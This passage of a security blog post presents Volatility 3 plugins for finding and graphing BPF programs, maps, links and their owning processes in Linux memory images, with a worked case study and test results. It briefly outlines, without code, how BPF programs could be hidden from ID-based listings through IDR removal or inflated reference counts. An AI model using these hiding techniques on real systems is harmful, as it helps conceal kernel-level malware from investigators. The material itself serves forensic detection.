<p>Entries of the <a href="https://elixir.bootlin.com/linux/v6.1.63/source/kernel/bpf/syscall.c#L54"><code class="language-plaintext highlighter-rouge">link_idr</code></a> point to objects of type <a href="https://elixir.bootlin.com/linux/v6.1.63/source/include/linux/bpf.h#L1259"><code class="language-plaintext highlighter-rouge">bpf_link</code></a>. Again, there is an informational structure, <a href="https://elixir.bootlin.com/linux/v6.1.63/source/include/uapi/linux/bpf.h#L6242"><code class="language-plaintext highlighter-rouge">bpf_link_info</code></a>, which is this time filled in the <a href="https://elixir.bootlin.com/linux/v6.1.63/source/kernel/bpf/syscall.c#L4246"><code class="language-plaintext highlighter-rouge">bpf_link_get_info_by_fd</code></a> function. By analyzing this function, we wrote the <a href="https://github.com/vobst/BPFVol3/blob/main/src/plugins/bpf_listlinks.py"><code class="language-plaintext highlighter-rouge">bpf_listlinks</code></a> plugin that retrieves the following pieces of information.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">columns</span><span class="p">:</span> <span class="nb">list</span><span class="p">[</span><span class="nb">tuple</span><span class="p">[</span><span class="nb">str</span><span class="p">,</span> <span class="n">Any</span><span class="p">]]</span> <span class="o">=</span> <span class="p">[</span>
    <span class="p">(</span><span class="s">"OFFSET (V)"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"ID"</span><span class="p">,</span> <span class="nb">int</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"TYPE"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"PROG"</span><span class="p">,</span> <span class="nb">int</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"ATTACH"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
<span class="p">]</span>
</code></pre></div></div>
<p>Here, the last column is obtained by mimicking the virtual call to <code class="language-plaintext highlighter-rouge">link-&gt;ops-&gt;fill_link_info</code> that adds link-type specific information about the associated attachment point, e.g., for tracing links it adds the BTF object and type IDs we saw earlier.</p>

<h3 id="lsm-hooks">LSM Hooks</h3>

<p>Our three listing plugins have one conceptual weakness in common: they rely entirely on information obtained by parsing the <code class="language-plaintext highlighter-rouge">(prog|map|link)_idr</code>s. However, the entire ID mechanism is in the user-facing part of the BPF subsystem, its simply a means for user space to refer to BPF objects in syscalls. Thus, our plugins are susceptible to trivial anti-forensic tampering.</p>

<p>In our research, we prototyped two anti-forensic methods that remove BPF objects from these structures while still keeping the corresponding program active in the kernel. First, the more straightforward way is to simply write a kernel module that uses standard APIs to remove IDs from the IDRs. The second one is based on the observation that the lifecycle of BPF objects is managed via reference counts. Thus, if we artificially increment the reference count of an object that (indirectly) holds references to all other objects that are required to operate a BPF program, e.g., a link, we can prevent the program’s destruction when all “regular” references are dropped.</p>

<p>One approach to counter these anti-forensic measures is to “approach from the other side”. Instead of relying on information from sources that are far detached from the actual program execution, we go to the very places and mechanisms that invoke the program. The downside is obviously that this low-level code is much more program-type and architecture specific, the results, on the other hand, are more robust.</p>

<p>In a <a href="https://blog.eb9f.de/2023/04/24/lsm2bpf.html">previous blog post</a> we described the low-level details that lead up to the execution of BPF LSM programs in great detail. Based on this knowledge, we developed the <a href="https://github.com/vobst/BPFVol3/blob/main/src/plugins/bpf_lsm.py"><code class="language-plaintext highlighter-rouge">bpf_lsm</code></a> plugin that can discover hidden BPF programs attached to security hooks. In short, the plugin checks the places where the kernel control flow may be diverted into the BPF VM for the presence of inline hooks. If they are found, it cross checks with the links IDR to see if there is a corresponding link, the absence of which is a strong indication of tampering. Additionally, the plugin is also valuable in the absence of tampering, as it shows you the exact program attachment point without the need to manually resolve BTF IDs. In particular, the plugin displays the number of attached programs and their IDs along with the name of the LSM hook where they are attached.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">columns</span><span class="p">:</span> <span class="nb">list</span><span class="p">[</span><span class="nb">tuple</span><span class="p">[</span><span class="nb">str</span><span class="p">,</span> <span class="nb">type</span><span class="p">]]</span> <span class="o">=</span> <span class="p">[</span>
    <span class="p">(</span><span class="s">"LSM HOOK"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"Nr. PROGS"</span><span class="p">,</span> <span class="nb">int</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"IDs"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
<span class="p">]</span>
</code></pre></div></div>

<h3 id="networking-hooks">Networking Hooks</h3>

<p>As we described above, traffic control (tc) programs are especially useful for exfiltrating information from infected machines, e.g., by hijacking existing TCP connections. Thus, the second plugin that obtains its information from more tamper resistant sources targets tc BPF programs. It only relies on the <a href="https://elixir.bootlin.com/linux/v6.1.65/source/include/net/sch_generic.h#L1265"><code class="language-plaintext highlighter-rouge">mini_Qdisc</code></a> structure that is used on the transmission and receive fast paths to look up queuing disciplines (qdisc) attached to a network device.</p>

<p>We use the <a href="https://github.com/volatilityfoundation/community3/blob/master/Sheffer_Shaked_Docker/plugins/ifconfig.py"><code class="language-plaintext highlighter-rouge">ifconfig plugin</code></a> by Ofek Shaked and Amir Sheffer to obtain a list of all network devices. Then, we find the above-mentioned structure and use it to collect all BPF programs that are involved into qdiscs on this device. With kernel 6.3 the process of locating the <code class="language-plaintext highlighter-rouge">mini_Qdisc</code> from the network interface changed slightly due to the introduction of link-based attachment of tc programs, however, the plugin recognizes and handles both cases. Finally, the <a href="https://github.com/vobst/BPFVol3/blob/main/src/plugins/bpf_netdev.py"><code class="language-plaintext highlighter-rouge">bpf_netdev</code></a> plugin displays the following information about each interface where at least one BPF program was found,</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">columns</span><span class="p">:</span> <span class="nb">list</span><span class="p">[</span><span class="nb">tuple</span><span class="p">[</span><span class="nb">str</span><span class="p">,</span> <span class="nb">type</span><span class="p">]]</span> <span class="o">=</span> <span class="p">[</span>
    <span class="p">(</span><span class="s">"NAME"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"MAC ADDR"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"EGRESS"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"INGRESS"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
<span class="p">]</span>
</code></pre></div></div>
<p>where the <code class="language-plaintext highlighter-rouge">EGRESS</code> and <code class="language-plaintext highlighter-rouge">INGRESS</code> hold the IDs of the programs that process packets flowing into the respective direction.</p>

<h3 id="finding-processes">Finding Processes</h3>

<p>Yet another way to discover BPF objects is through the processes that hold on to them. As with many other resources, programs, links, maps, and btf are represented to processes as file descriptors. They can be used to act on the object, retrieve information about it, and serve as a mechanism to clean up after processes that did not exit gracefully. Furthermore, an investigator might want to find out which process holds on to a specific BPF object in order to investigate this process further.</p>

<p>Thus, the <a href="https://github.com/vobst/BPFVol3/blob/main/src/plugins/bpf_listprocs.py"><code class="language-plaintext highlighter-rouge">bpf_listprocs</code></a> plugin displays the following pieces of information for every process that holds on to at least one BPF object via a file descriptor.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">columns</span><span class="p">:</span> <span class="nb">list</span><span class="p">[</span><span class="nb">tuple</span><span class="p">[</span><span class="nb">str</span><span class="p">,</span> <span class="nb">type</span><span class="p">]]</span> <span class="o">=</span> <span class="p">[</span>
    <span class="p">(</span><span class="s">"PID"</span><span class="p">,</span> <span class="nb">int</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"COMM"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"PROGS"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"MAPS"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"LINKS"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
<span class="p">]</span>
</code></pre></div></div>
<p>Here, the <code class="language-plaintext highlighter-rouge">PROGS</code>. <code class="language-plaintext highlighter-rouge">MAPS</code>, and <code class="language-plaintext highlighter-rouge">LINKS</code> columns display the IDs of the respective objects. This list is generated by iterating over all file descriptors and the associated <a href="https://elixir.bootlin.com/linux/v6.1.63/source/include/linux/fs.h#L940"><code class="language-plaintext highlighter-rouge">file</code></a> structures. BPF objects are identified by checking the file operations <code class="language-plaintext highlighter-rouge">f_op</code> pointer, and the corresponding <code class="language-plaintext highlighter-rouge">bpf_(prog|map|link)</code> structures are found by following the pointer stored in the <code class="language-plaintext highlighter-rouge">private</code> member.</p>

<p>Not every BPF object must be reachable from the process list, however. They can, for example, also be represented as files under the special <code class="language-plaintext highlighter-rouge">bpf</code> filesystem, which is usually mounted at <code class="language-plaintext highlighter-rouge">/sys/fs/bpf</code>, or processes can close file descriptors and the object will remain alive as long as there are other references to it.</p>

<h3 id="connecting-the-dots">Connecting the Dots</h3>

<p>Finally, we would like to present the <a href="https://github.com/vobst/BPFVol3/blob/main/src/plugins/bpf_graph.py"><code class="language-plaintext highlighter-rouge">bpf_graph</code></a> plugin, a meta analysis that we have build on top of the four listing plugins. As its name suggest, its goal is to visualize the state of the BPF subsystem as a graph.</p>

<p>There are four types of nodes in this graph: programs, maps, links and processes. Different node types are distinguished by shape. Within a node type, the different program/map/link types are distinguished by color and process nodes are colored based on their process ID (PID). Furthermore, map and program nodes are labeled with the ID and name of the object, link nodes are labeled with the ID and attachment information of the link, and process nodes receive the PID and comm (name of the user-space program binary) of their process as labels.</p>

<p>There are three types of edges to establish relationships between nodes: file descriptor, link, and map. File descriptor edges are dotted and connect processes to BPF objects that they have an open fd for. Link edges are dashed and connect BPF links to the program they reference. Finally, map edges are drawn solid and connect maps to all of the programs that use them.</p>

<p>Especially for large applications with hundreds or even thousands of objects, it is essential to be able to filter the graph to make it useful. We have therefore implemented two additional options that can be passed to the plugin. First, you can pass a list of node types to include in the output. Second, you can pass a list of nodes, and only the connected components that contain at least one of those nodes will be drawn.</p>

<p>The idea of this plugin is to make the information of the four listing plugins more accessible to investigators by combining it into a single picture. This is especially useful for complex applications with possibly hundreds of programs and maps, or on busy systems where many different processes have loaded BPF programs.</p>

<p>Plugin output comes in two forms, a dot-format encoding of the graph, where each BPF object node has metadata containing all of the plugin columns, and as a picture of the graph, drawn with a default layout algorithm. The latter should suffice for most users, but the former allows advanced use-cases to do further processing.</p>

<p><em>Note: We provide <a href="https://github.com/vobst/BPFVol3/tree/main/docs">standalone documentation</a> for all plugins in our project on GitHub.</em></p>

<h2 id="case-study">Case Study</h2>

<p>In this section we will use the plugins to examine the memory image of a system with a high level of BPF activity. To get a diverse set of small BPF applications we launched the example programs that come with <a href="https://github.com/libbpf/libbpf-bootstrap">libbpf-bootstrap</a> and some of the kernel self-tests. You can download the <a href="https://drive.proton.me/urls/DBWB4GFRK8#7IbjrGRg6o5z">memory image</a> and <a href="https://drive.proton.me/urls/BCKSBBZ6Z4#ZeZcrnYlF7tZ">symbols</a> to follow along. If you prefer to analyze a single, large application have a look at the <code class="language-plaintext highlighter-rouge">krie</code> example <a href="https://github.com/vobst/BPFVol3/blob/main/docs/examples/krie/krie.md">in our plugin documentation</a>.</p>

<p>A good first step is to use the graph plugin to get an overview of the subsystem (<code class="language-plaintext highlighter-rouge"># vol -f /io/dumps/debian-bookworm-6.1.0-13-amd64_all.raw linux.bpf_graph</code>).</p>

<p><img src="/media/bpf_memory_forensics_with_volatility_3/debian-bookworm-6.1.0-13-amd64_all.png" alt="debian-bookworm-6.1.0-13-amd64_all.png" /></p>

<p>As we can see, there are several components corresponding to different processes, each of which holds a number of BPF resources. Let us begin by examining the “Hello, World” example of BPF, the <a href="https://github.com/libbpf/libbpf-bootstrap/blob/master/examples/c/minimal.bpf.c"><code class="language-plaintext highlighter-rouge">minimal</code></a> program:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause</span>
<span class="cm">/* Copyright (c) 2020 Facebook */</span>
<span class="cp">#include</span> <span class="cpf">&lt;linux/bpf.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;bpf/bpf_helpers.h&gt;</span><span class="cp">
</span>
<span class="kt">char</span> <span class="n">LICENSE</span><span class="p">[]</span> <span class="n">SEC</span><span class="p">(</span><span class="s">"license"</span><span class="p">)</span> <span class="o">=</span> <span class="s">"Dual BSD/GPL"</span><span class="p">;</span>

<span class="kt">int</span> <span class="n">my_pid</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="n">SEC</span><span class="p">(</span><span class="s">"tp/syscalls/sys_enter_write"</span><span class="p">)</span>
<span class="kt">int</span> <span class="nf">handle_tp</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">ctx</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">bpf_get_current_pid_tgid</span><span class="p">()</span> <span class="o">&gt;&gt;</span> <span class="mi">32</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">!=</span> <span class="n">my_pid</span><span class="p">)</span>
		<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>

	<span class="n">bpf_printk</span><span class="p">(</span><span class="s">"BPF triggered from PID %d.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">pid</span><span class="p">);</span>

	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The above source code is compiled with clang to produce an ELF relocatable object file. It contains the BPF bytecode along with additional information, like BTF sections, CORE relocations, programs as well as their attachment mechanisms and points, maps that are used and so on. This ELF is then embedded into a user space program that statically links against libbpf. At runtime, it passed the ELF to libbpf, which takes care of all the relocations and kernel interactions required to wire up the program to the BPF VM.</p>

<p>With the above C code in the back of our heads, we can now have a look at the relevant component of live system’s BPF object graph. To limit the output of the plugin to the connected components that contain certain nodes, we can add the <code class="language-plaintext highlighter-rouge">--components</code> flag to the invocation and give it a list of nodes (the format is <code class="language-plaintext highlighter-rouge">&lt;node_type&gt;-&lt;id&gt;</code> where <code class="language-plaintext highlighter-rouge">node_type</code> is in <code class="language-plaintext highlighter-rouge">{map,link,prog,proc}</code> and <code class="language-plaintext highlighter-rouge">id</code> is the BPF object ID or PID).</p>

<p><img src="/media/bpf_memory_forensics_with_volatility_3/debian-bookworm-6.1.0-13-amd64_all_components_proc-695.png" alt="debian-bookworm-6.1.0-13-amd64_all_components_proc-695.png" /></p>

<p>As we can see, the ELF has caused libbpf to create a program, two maps and a link while loading. We can now use our plugins to gather more information about each object. Let’s start with the program itself.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># vol -f /io/dumps/debian-bookworm-6.1.0-13-amd64_all.raw linux.bpf_listprogs --id 98 --dump-jited --dump-xlated
Volatility 3 Framework 2.5.0
Progress:  100.00               Stacking attempts finished
OFFSET (V)      ID      TYPE    NAME    TAG     LOADED AT       MAP IDs BTF ID  HELPERS

0xbce500673000  98      TRACEPOINT      handle_tp       6a5dcef153b1001e        1417821088492   40,45   196     bpf_get_current_pid_tgid,bpf_trace_printk
</code></pre></div></div>

<p>By looking at the last column we can see that it is indeed using two kernel helper functions, where the apparent call to <code class="language-plaintext highlighter-rouge">bpf_printk</code> turns out to be a macro that expands to <code class="language-plaintext highlighter-rouge">bpf_trace_printk</code>. If we look at the program byte and the machine code side by side, we can discover a few things.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># cat .prog_0xbce500673000_98_bdisasm
0x0: 85 00 00 00 10 b2 02 00                         call 0x2b210
0x8: 77 00 00 00 20 00 00 00                         rsh64 r0, 0x20
0x10: 18 01 00 00 00 a0 49 00 00 00 00 00 e5 bc ff ff lddw r1, 0xffffbce50049a000
0x20: 61 11 00 00 00 00 00 00                         ldxw r1, [r1]
0x28: 5d 01 05 00 00 00 00 00                         jne r1, r0, +0x5
0x30: 18 01 00 00 10 83 83 f5 00 00 00 00 7b 9b ff ff lddw r1, 0xffff9b7bf5838310
0x40: b7 02 00 00 1c 00 00 00                         mov64 r2, 0x1c
0x48: bf 03 00 00 00 00 00 00                         mov64 r3, r0
0x50: 85 00 00 00 80 0c ff ff                         call 0xffff0c80
0x58: b7 00 00 00 00 00 00 00                         mov64 r0, 0x0
0x60: 95 00 00 00 00 00 00 00                         exit 

# cat .prog_0xbce500673000_98_mdisasm

handle_tp:
 0xffffc03772a0: 0f 1f 44 00 00                               nop dword ptr [rax + rax]
 0xffffc03772a5: 66 90                                        nop
 0xffffc03772a7: 55                                           push rbp
 0xffffc03772a8: 48 89 e5                                     mov rbp, rsp
 0xffffc03772ab: e8 d0 fc aa f1                               call 0xffffb1e26f80       # bpf_get_current_pid_tgid
 0xffffc03772b0: 48 c1 e8 20                                  shr rax, 0x20
 0xffffc03772b4: 48 bf 00 a0 49 00 e5 bc ff ff                movabs rdi, 0xffffbce50049a000    # minimal_.bss + 0x110
 0xffffc03772be: 8b 7f 00                                     mov edi, dword ptr [rdi]
 0xffffc03772c1: 48 39 c7                                     cmp rdi, rax
 0xffffc03772c4: 75 17                                        jne 0xffffc03772dd        # handle_tp + 0x3d
 0xffffc03772c6: 48 bf 10 83 83 f5 7b 9b ff ff                movabs rdi, 0xffff9b7bf5838310    # minimal_.rodata + 0x110
 0xffffc03772d0: be 1c 00 00 00                               mov esi, 0x1c
 0xffffc03772d5: 48 89 c2                                     mov rdx, rax
 0xffffc03772d8: e8 13 57 a7 f1                               call 0xffffb1dec9f0       # bpf_trace_printk
 0xffffc03772dd: 31 c0                                        xor eax, eax
 0xffffc03772df: c9                                           leave
 0xffffc03772e0: c3                                           ret
 0xffffc03772e1: cc                                           int3
</code></pre></div></div>

<p>The first lesson here is probably that symbol annotations are useful :). As expected, when ignoring the prologue and epilogue inserted by the JIT-compiler, the translation between BPF and x86_64 is essentially one-to-one. Furthermore, uses of global C variables like <code class="language-plaintext highlighter-rouge">my_pid</code> or the format string result in direct references to kernel memory, where the closest preceding symbols are the <code class="language-plaintext highlighter-rouge">minimal_.bss</code>’s and <code class="language-plaintext highlighter-rouge">minimal_.rodata</code>’s <code class="language-plaintext highlighter-rouge">bpf_map</code> structures, respectively. For simple array maps, the <code class="language-plaintext highlighter-rouge">bpf_map</code> structure resides at the beginning of a buffer that also holds the array data, <code class="language-plaintext highlighter-rouge">0x110</code> is simply the offset at which the map’s payload data starts. More generally, libbpf will automatically create maps to hold the variables living in the <code class="language-plaintext highlighter-rouge">.data</code>, <code class="language-plaintext highlighter-rouge">.rodata</code>, and <code class="language-plaintext highlighter-rouge">.bss</code> sections.</p>

<p>Dumping the map contents confirms that the <code class="language-plaintext highlighter-rouge">.bss</code> map holds the <code class="language-plaintext highlighter-rouge">minimal</code> process’s PID while the <code class="language-plaintext highlighter-rouge">.rodata</code> map contains the format string.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># vol -f /io/dumps/debian-bookworm-6.1.0-13-amd64_all.raw linux.bpf_listmaps --id 45 40 --dump
Volatility 3 Framework 2.5.0
Progress:  100.00               Stacking attempts finished
OFFSET (V)      ID      TYPE    NAME    KEY SIZE        VALUE SIZE      MAX ENTRIES

0xbce500499ef0  40      ARRAY   minimal_.bss    4       4       1
0x9b7bf5838200  45      ARRAY   minimal_.rodata 4       28      1
# cat .map_0xbce500499ef0_40
{"0": "section (.bss) = {\n (my_pid) (int) b'\\xb7\\x02\\x00\\x00'\n"}
# cat .map_0x9b7bf5838200_45
{"0": "section (.rodata) = {\n (handle_tp.____fmt) b'BPF triggered from PID %d.\\n\\x00'\n"}
</code></pre></div></div>

<p>In the source code we saw the directive <code class="language-plaintext highlighter-rouge">SEC("tp/syscalls/sys_enter_write")</code>, which instructs the compiler to place the <code class="language-plaintext highlighter-rouge">handle_tp</code> function’s BPF bytecode in an ELF section called <code class="language-plaintext highlighter-rouge">"tp/syscalls/sys_enter_write"</code>. While loading, libbpf picks this up and creates a link that attaches the program to a perf event that is activated by the <code class="language-plaintext highlighter-rouge">sys_enter_write</code> tracepoint. We can inspect the link, but getting more information about the corresponding trace point is not yet implemented. Contributions are always highly welcome :)</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># vol -f /io/dumps/debian-bookworm-6.1.0-13-amd64_all.raw linux.bpf_listlinks --id 11
Volatility 3 Framework 2.5.0
Progress:  100.00               Stacking attempts finished
OFFSET (V)      ID      TYPE    PROG    ATTACH

0x9b7bc2c09ae0  11      PERF_EVENT      98
</code></pre></div></div>

<p>Dissecting the “Hello, World” programm was useful to get an impression of what a BPF application looks like at runtime. Before concluding this section, we will have a look at a less minimalist example, the process with PID 687.</p>

<p><img src="/media/bpf_memory_forensics_with_volatility_3/debian-bookworm-6.1.0-13-amd64_all_components_proc-687.png" alt="debian-bookworm-6.1.0-13-amd64_all_components_proc-687.png" /></p>

<p>This process is one of the kernel self-tests. It tests a BPF feature that allows to load new function pointer tables used for dynamic dispatch (so called structure operations), where the individual operations are implemented as BPF programs, at runtime. The programs that implement the new operations can be recognized by their type <code class="language-plaintext highlighter-rouge">STRUCT_OPS</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># vol -f /io/dumps/debian-bookworm-6.1.0-13-amd64_all.raw linux.bpf_listprogs --id 37 39 40 42 43 44 45
Volatility 3 Framework 2.5.0
Progress:  100.00               Stacking attempts finished
OFFSET (V)      ID      TYPE    NAME    TAG     LOADED AT       MAP IDs BTF ID  HELPERS

0xbce5003b7000  37      STRUCT_OPS      dctcp_init      562160e42a59841c        1417427431243   9,10,7  124     bpf_sk_storage_get,bpf_sk_storage_delete
0xbce50046b000  39      STRUCT_OPS      dctcp_ssthresh  cddbf7f9cf9b52d7        1417427590219   9       124
0xbce500473000  40      STRUCT_OPS      dctcp_update_alpha      6e84698df8007e42        1417427647277   9       124
0xbce500487000  42      STRUCT_OPS      dctcp_state     dc878de7981c438b        1417427777414   9       124
0xbce500493000  43      STRUCT_OPS      dctcp_cwnd_event        70cbe888b7ece66f        1417427888091   9       124     bpf_tcp_send_ack
0xbce5004e5000  44      STRUCT_OPS      dctcp_cwnd_undo 78b977678332d89f        1417428066805   9       124
0xbce5004eb000  45      STRUCT_OPS      dctcp_cong_avoid        20ff0d9ab24c8843        1417428109672   9       124     tcp_reno_cong_avoid
</code></pre></div></div>

<p>The mapping between the programs and the function pointer table they implement is realized through a special map of type <code class="language-plaintext highlighter-rouge">STRUCT_OPS</code> created by the process.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># vol -f /io/dumps/debian-bookworm-6.1.0-13-amd64_all.raw linux.bpf_listmaps --id 11 12
Volatility 3 Framework 2.5.0
Progress:  100.00               Stacking attempts finished
OFFSET (V)      ID      TYPE    NAME    KEY SIZE        VALUE SIZE      MAX ENTRIES

0x9b7bc3c41000  11      STRUCT_OPS      dctcp_nouse     4       256     1
0x9b7bc3c43400  12      STRUCT_OPS      dctcp   4       256     1

</code></pre></div></div>

<p>Unfortunately, the current implementation does not parse the contents of the map, so it cannot determine the name of the kernel structure being implemented and the mapping between its member functions and the BPF programs. As always, contributions are highly welcome :). In this case, we would find out that it implements <a href="https://elixir.bootlin.com/linux/v6.1.65/source/include/net/tcp.h#L1071"><code class="language-plaintext highlighter-rouge">tcp_congestion_ops</code></a> to load a new TCP congestion control algorithm on the fly.</p>

<p>There is a lot more to explore in this memory image, so feel free to have a closer look at the other processes. You might also want to check out the <code class="language-plaintext highlighter-rouge">krie</code> example in <a href="https://github.com/vobst/BPFVol3/blob/main/docs/examples/krie/krie.md"><code class="language-plaintext highlighter-rouge">our documentation</code></a> to get an impression of a larger BPF application.</p>

<h2 id="testing">Testing</h2>

<p>We tested the plugins on memory images acquired from virtual machines running on QEMU/KVM that were suspended for the duration of the acquisition process. To ensure the correctness of all plugin results, we have cross-checked them by debugging the guest kernel as well as comparing them with <code class="language-plaintext highlighter-rouge">bpftool</code> running on the guest.</p>

<p>Below is a list of the distributions and releases that we used for manual testing</p>

<p><strong>Debian</strong></p>
<ul>
  <li>12.2.0-14, Linux 6.1.0-13</li>
</ul>

<p><strong>Ubuntu</strong></p>
<ul>
  <li>22.04.2, Linux 5.15.0-89-generic</li>
  <li>20.04, Linux 5.4.0-26-generic</li>
</ul>

<p><strong>Custom</strong></p>
<ul>
  <li>Linux 6.0.12, various configurations</li>
  <li>Linux 6.2.12, various configurations</li>
</ul>

<p>For each of these kernels, we tested at least all the plugins on an image taken during the execution of the libbpf-bootstrap example programs.</p>

<p>Additionally, to the above mentioned kernels we also developed an evaluation framework (the code is not public). The framework is based on <a href="https://www.vagrantup.com/">Vagrant</a> and <a href="https://libvirt.org/">libvirt</a>/<a href="https://linux-kvm.org/page/Main_Page">KVM</a>. First we create and update all VMs. After that we run programs from <code class="language-plaintext highlighter-rouge">libbpf-bootstrap</code> with <code class="language-plaintext highlighter-rouge">nohup</code> so that we can leave the VM and dump the memory from outside. To dump the memory we use <code class="language-plaintext highlighter-rouge">virsh</code> with <code class="language-plaintext highlighter-rouge">virsh dump &lt;name of VM&gt; --memory-only</code>. <code class="language-plaintext highlighter-rouge">virsh dump</code> pauses the VM for a clean acquisition of the main memory. We also install debug symbols for all the Linux distributions under investigation so that we can gather the debug kernels (<code class="language-plaintext highlighter-rouge">vmlinux</code> with DWARF debugging information) and the <code class="language-plaintext highlighter-rouge">System.map</code> file. We then use both files with <a href="https://github.com/volatilityfoundation/dwarf2json"><code class="language-plaintext highlighter-rouge">dwarf2json</code></a> to generate the ISF information that Volatility 3 needs. Currently, we tested the following Linux distributions with their respective kernels:</p>

<ul>
  <li>Alma Linux 9 - Linux kernel 5.14.0-362.8.1.el9_3.x86_64 ✅</li>
  <li>Fedora 38 - Linux kernel 6.6.6-100.fc38.x86_64 ✅</li>
  <li>Fedora 39 - Linux kernel 6.6.6-200.fc39.x86_64 ✅</li>
  <li>CentOS Stream 9 - Linux kernel 5.14.0-391.el9.x86_64 ✅</li>
  <li>Rocky Linux 8 - Linux kernel 4.18.0-513.9.1.el8_9.x86_64 ✅</li>
  <li>Rocky Linux 9 - 🪲 <code class="language-plaintext highlighter-rouge">kernel-debuginfo-common</code> package is missing so the kernel debugging symbols cannot be installed (<a href="https://download.rockylinux.org/pub/rocky/9/BaseOS/x86_64/debug/tree/Packages/k/">list of packages</a>)</li>
  <li>Debian 11 - Linux kernel 5.10.0-26-amd64 ✅</li>
  <li>Debian 12 - Linux kernel 6.1.0-13-amd64 ✅</li>
  <li>Ubuntu 22.04 - Linux kernel 5.15.0-88-generic ✅</li>
  <li>Ubuntu 23.10 - Linux kernel 6.5.0-10-generic ✅ (works partially, but process listing is broken due to this <a href="https://github.com/volatilityfoundation/dwarf2json/issues/57">dwarf2json GitHub Issue</a>)</li>
  <li>ArchLinux - Linux kernel 6.6.7-arch1-1 ✅ (works partially, but breaks probably due to the same issue as <a href="https://github.com/volatilityfoundation/volatility3/issues/1065">volatility3/dwarf2json GitHub Issue</a>)</li>
  <li>openSUSE Tumbleweed - 🪲 we currently did not find the debugging symbols in the debugging kernel (<a href="https://bugzilla.opensuse.org/show_bug.cgi?id=1218163">openSUSE Bugzilla</a>)</li>
</ul>

<p>We will check if the problems get resolved and re-evaluate our plugin. Generally, our framework is designed to support more distributions as well and we will try to evaluate the plugin on a wider variety of them.</p>

<p>During our automated analysis we encountered an interesting problem. To collect the kernels with debugging symbols from the VMs we need to copy them to the host. When copying the kernel executable file it will be read into main memory by the kernel’s page-cache mechanism. This implies that parts of the kernel file (vmlinux) and the kernel itself (the running kernel not the file) may be present in the dump. This can lead to the problem of the Volatility 3 function <code class="language-plaintext highlighter-rouge">find_aslr</code> (<a href="https://github.com/volatilityfoundation/volatility3/blob/fdf93f502fa8d0edc2b60764463aee3c455aeb03/volatility3/framework/automagic/linux.py#L121">source code</a>) first finding matches in the page-cached kernel file (vmlinux) and not in the running kernel. An issue has been opened <a href="https://github.com/volatilityfoundation/volatility3/pull/1070">here</a>.</p>

<h2 id="related-work">Related Work</h2>

<p>There are several articles on BPF that cover different security-related aspects of the subsystem. In this section, we will briefly discuss the ones that are most relevant to the presented work.</p>

<p><strong>Memory Forensics</strong>: The <a href="https://github.com/crash-utility/crash/tree/master"><code class="language-plaintext highlighter-rouge">crash</code></a> utility, which is used to analyze live systems or kernel core dumps, has a <a href="https://github.com/crash-utility/crash/blob/master/bpf.c"><code class="language-plaintext highlighter-rouge">bpf</code> subcommand</a> that can be used to display information about BPF maps and programs. However, as it is not a forensics tool it relies solely on the information obtained via the <code class="language-plaintext highlighter-rouge">prog_idr</code> and <code class="language-plaintext highlighter-rouge">map_ird</code>. Similarly, the <a href="https://github.com/osandov/drgn"><code class="language-plaintext highlighter-rouge">drgn</code></a> programmable debugger comes with a <a href="https://github.com/osandov/drgn/blob/main/tools/bpf_inspect.py">script</a> to list BPF programs and maps but suffers from the same problems when it comes to anti-forensic techniques. Furthermore, <code class="language-plaintext highlighter-rouge">drgn</code> and <code class="language-plaintext highlighter-rouge">crash</code> are primarily known as debugging tools for systems developers and as such not necessarily well-established in the digital forensics and incidence response (DFIR) community. In contrast, we implemented our analyses as plugins for the popular Volatility framework well-known in the DFIR community. Finally, A. Case and G. Richard presented Volatility plugins for investigating the Linux tracing infrastructure in their <a href="https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Fixing-A-Memory-Forensics-Blind-Spot-Linux-Kernel-Tracing-wp.pdf">BlackHat US 